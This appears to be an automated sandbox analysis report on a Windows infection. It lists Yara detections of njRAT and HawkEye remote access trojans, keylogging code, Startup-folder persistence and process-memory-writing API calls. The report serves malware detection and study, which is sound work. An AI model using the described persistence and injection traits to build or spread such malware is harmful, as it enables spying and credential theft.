Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: Tmp.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: servieda.exe.1.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC5672 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC55CA NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC571A NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC56ED NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC5590 NtQuerySystemInformation,

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 1_2_00007FFD067D36BD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 1_2_00007FFD067D1E55
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_00A82238
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E60AA
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E36BD
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E620C
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E650D
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E792A
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E61D3
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E1E55
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 8_2_00007FFD06803985
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 8_2_00007FFD06801E55
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E5DCA
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F4D5E0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F49530
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F48C60
